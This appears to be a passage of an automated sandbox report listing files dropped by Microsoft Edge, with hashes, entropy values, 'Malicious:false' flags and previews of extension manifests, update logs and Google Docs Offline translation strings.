                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):206855
                                                                                                                                                                                                                  Entropy (8bit):7.983996634657522
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEI5:l81Lel7E6lEMVo/S01fDpWmEgD
                                                                                                                                                                                                                  MD5:788DF0376CE061534448AA17288FEA95
                                                                                                                                                                                                                  SHA1:C3B9285574587B3D1950EE4A8D64145E93842AEB
                                                                                                                                                                                                                  SHA-256:B7FB1D3C27E04785757E013EC1AC4B1551D862ACD86F6888217AB82E642882A5
                                                                                                                                                                                                                  SHA-512:3AA9C1AA00060753422650BBFE58EEEA308DA018605A6C5287788C3E2909BE876367F83B541E1D05FE33F284741250706339010571D2E2D153A5C5A107D35001
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1658
                                                                                                                                                                                                                  Entropy (8bit):5.409825301624222
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:Y4MfJVe5wMd5wMe07cIF5Io0MY5kU2A0OpJ5xnL0MotJ5VovUx0K1X5mU0Z/L5M:JIVuwEw5MUFZLBQLtZ6NM
                                                                                                                                                                                                                  MD5:02AD9E3BC3D2638429DD9E8C87C2D690
                                                                                                                                                                                                                  SHA1:9E177A82ECECA4EDF0AA6CD47022CE1B551D8E2D
                                                                                                                                                                                                                  SHA-256:B5CED00336E69FBF3A610F3CDF280BB4B96E4734A9CF07DD7D5A0B75DDF8E2A4
                                                                                                                                                                                                                  SHA-512:1AD466782536B6B74BABB5C099BD1F3032187F3A23FADC1268F387EC05AB791D59823576F43A459C4FC4D0BEECF3B6A9FBA24A170506598577420DCE7B3E6760
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"logTime": "1005/061810", "correlationVector":"0kV+/vRB8ay0a3Cue7mk6o","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"AFo3IfjRT+3l4ojiXpMdNH","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"838E3BF9A44F456CB4AD62AC737EDD15","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063233", "correlationVector":"2N8fwTcZh6EtTfQ8o4+6aX","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063233", "correlationVector":"5ADEBA42608E4CC9A1FACA719F284CF9","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063346", "correlationVector":"xp/hBMCdVPtUIxZHIviv/x","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063347", "correlationVector":"BF0B9E58C0CC45ED9AB5D0371131E69A","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/064305", "correlationVector":"ONVjsWDap1LyjIRdxsqPGs","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/064305", "correlationVector":"82E52491
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):154477
                                                                                                                                                                                                                  Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                  MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                  SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                  SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                  SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11185
                                                                                                                                                                                                                  Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                  MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                  SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                  SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                  SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 41924
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):76314
                                                                                                                                                                                                                  Entropy (8bit):7.996159328201069
                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                  SSDEEP:1536:fFZ2cHkObrS5Vvm808scZeEzFrSpzBUl4MZIGM/iysAGz88:fbb1UdS8scZNzFrMa4M+lKqeZ
                                                                                                                                                                                                                  MD5:703D592C85D2790D89047C1614A54B4F
                                                                                                                                                                                                                  SHA1:0C08F096AD544A63ACE8AA1AA738CC0B374F2A23
                                                                                                                                                                                                                  SHA-256:A01513000969824FA1761DCDD77F5EE9B6FD958B4E9596522CEBC47BB69DF194
                                                                                                                                                                                                                  SHA-512:D0C0F0B0A060D3DD52942556615B93971292E1F0C10555681CB6E4857E605EB2CFBACBADD263FB954D4062A63BBCCCB4B514428FDB95F6C0C94CC221B28B1ED5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1753
                                                                                                                                                                                                                  Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                  MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                  SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                  SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                  SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):9815
                                                                                                                                                                                                                  Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                  MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                  SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                  SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                  SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):10388
                                                                                                                                                                                                                  Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                  MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                  SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                  SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                  SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):962
                                                                                                                                                                                                                  Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                  MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                  SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                  SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                  SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11185
                                                                                                                                                                                                                  Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                  MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                  SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                  SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                  SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4982
                                                                                                                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):908
                                                                                                                                                                                                                  Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                  MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                  SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                  SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                  SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1285
                                                                                                                                                                                                                  Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                  MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                  SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                  SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                  SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1244
                                                                                                                                                                                                                  Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                  MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                  SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                  SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                  SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):977
                                                                                                                                                                                                                  Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                  MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                  SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                  SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                  SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3107
                                                                                                                                                                                                                  Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                  MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                  SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                  SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                  SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1389
                                                                                                                                                                                                                  Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1763
                                                                                                                                                                                                                  Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):930
                                                                                                                                                                                                                  Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):913
                                                                                                                                                                                                                  Entropy (8bit):4.947221919047
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):806
                                                                                                                                                                                                                  Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):883
                                                                                                                                                                                                                  Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1031
                                                                                                                                                                                                                  Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1613
